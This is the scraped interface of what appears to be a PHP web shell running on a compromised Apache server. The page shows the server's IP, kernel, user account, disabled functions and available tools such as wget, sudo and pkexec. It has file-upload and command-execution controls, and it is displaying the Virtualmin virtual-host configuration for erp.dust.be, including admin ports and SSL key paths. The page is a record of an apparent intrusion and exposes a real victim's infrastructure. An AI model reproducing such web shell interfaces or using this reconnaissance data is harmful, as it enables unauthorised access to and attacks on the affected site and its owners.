Private
Server IP : 195.201.23.43  /  Your IP : 3.145.175.141
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /etc/apache2/sites-available/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /etc/apache2/sites-available/erp.dust.be.conf
<VirtualHost 195.201.23.43:80 [2a01:4f8:c2c:a1a1::1]:80>
    SuexecUserGroup "#1091" "#1036"
    ServerName erp.dust.be
    ServerAlias www.erp.dust.be
    ServerAlias mail.erp.dust.be
    ServerAlias webmail.erp.dust.be
    ServerAlias admin.erp.dust.be
    DocumentRoot /home/erp/public_html
    ErrorLog /var/log/virtualmin/erp.dust.be_error_log
    CustomLog /var/log/virtualmin/erp.dust.be_access_log combined
    ScriptAlias /cgi-bin/ /home/erp/cgi-bin/
    ScriptAlias /awstats/ /home/erp/cgi-bin/
    DirectoryIndex index.php index.php4 index.php5 index.htm index.html
    <Directory /home/erp/public_html>
        Options -Indexes +IncludesNOEXEC +SymLinksIfOwnerMatch 
        Require all granted
        AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
        Action application/x-httpd-php5.6 /cgi-bin/php5.6.cgi
        Action application/x-httpd-php7.1 /cgi-bin/php7.1.cgi
        Action application/x-httpd-php7.4 /cgi-bin/php7.4.cgi
        Action application/x-httpd-php8.0 /cgi-bin/php8.0.cgi
        Action application/x-httpd-php8.2 /cgi-bin/php8.2.cgi
        AddType application/x-httpd-php5.6 .php5.6
        AddType application/x-httpd-php7.1 .php7.1
        AddType application/x-httpd-php7.4 .php7.4
        AddType application/x-httpd-php8.0 .php8.0
        AddType application/x-httpd-php8.2 .php8.2
        AddType application/x-httpd-php8.2 .php
    </Directory>
    <Directory /home/erp/cgi-bin>
        Require all granted
        AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
    </Directory>
    ProxyPass /.well-known !
    RewriteEngine on
    RewriteCond %{HTTP_HOST} =webmail.erp.dust.be
    RewriteRule ^(?!/.well-known)(.*) https://erp.dust.be:20000/ [R]
    RewriteCond %{HTTP_HOST} =admin.erp.dust.be
    RewriteRule ^(?!/.well-known)(.*) https://erp.dust.be:10000/ [R]
    RemoveHandler .php
    RemoveHandler .php5.6
    RemoveHandler .php7.1
    RemoveHandler .php7.4
    RemoveHandler .php8.0
    RemoveHandler .php8.2
    <Files awstats.pl>
        AuthName "erp.dust.be statistics"
        AuthType Basic
        AuthUserFile /home/erp/.awstats-htpasswd
        require valid-user
    </Files>
</VirtualHost>
<VirtualHost 195.201.23.43:443 [2a01:4f8:c2c:a1a1::1]:443>
    SuexecUserGroup "#1091" "#1036"
    ServerName erp.dust.be
    ServerAlias www.erp.dust.be
    ServerAlias mail.erp.dust.be
    ServerAlias webmail.erp.dust.be
    ServerAlias admin.erp.dust.be
    DocumentRoot /home/erp/public_html
    ErrorLog /var/log/virtualmin/erp.dust.be_error_log
    CustomLog /var/log/virtualmin/erp.dust.be_access_log combined
    ScriptAlias /cgi-bin/ /home/erp/cgi-bin/
    ScriptAlias /awstats/ /home/erp/cgi-bin/
    DirectoryIndex index.php index.php4 index.php5 index.htm index.html
    <Directory /home/erp/public_html>
        Options -Indexes +IncludesNOEXEC +SymLinksIfOwnerMatch 
        Require all granted
        AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
        Action application/x-httpd-php5.6 /cgi-bin/php5.6.cgi
        Action application/x-httpd-php7.1 /cgi-bin/php7.1.cgi
        Action application/x-httpd-php7.4 /cgi-bin/php7.4.cgi
        Action application/x-httpd-php8.0 /cgi-bin/php8.0.cgi
        Action application/x-httpd-php8.2 /cgi-bin/php8.2.cgi
        AddType application/x-httpd-php5.6 .php5.6
        AddType application/x-httpd-php7.1 .php7.1
        AddType application/x-httpd-php7.4 .php7.4
        AddType application/x-httpd-php8.0 .php8.0
        AddType application/x-httpd-php8.2 .php8.2
        AddType application/x-httpd-php8.2 .php
    </Directory>
    <Directory /home/erp/cgi-bin>
        Require all granted
        AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
    </Directory>
    ProxyPass /.well-known !
    RewriteEngine on
    RewriteCond %{HTTP_HOST} =webmail.erp.dust.be
    RewriteRule ^(?!/.well-known)(.*) https://erp.dust.be:20000/ [R]
    RewriteCond %{HTTP_HOST} =admin.erp.dust.be
    RewriteRule ^(?!/.well-known)(.*) https://erp.dust.be:10000/ [R]
    RemoveHandler .php
    RemoveHandler .php5.6
    RemoveHandler .php7.1
    RemoveHandler .php7.4
    RemoveHandler .php8.0
    RemoveHandler .php8.2
    SSLEngine on
    SSLCertificateFile /etc/ssl/virtualmin/17083476862266228/ssl.cert
    SSLCertificateKeyFile /etc/ssl/virtualmin/17083476862266228/ssl.key
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1
    <Files awstats.pl>
        AuthName "erp.dust.be statistics"
        AuthType Basic
        AuthUserFile /home/erp/.awstats-htpasswd
        require valid-user
    </Files>
    SSLCACertificateFile /etc/ssl/virtualmin/17083476862266228/ssl.ca
</VirtualHost>
Private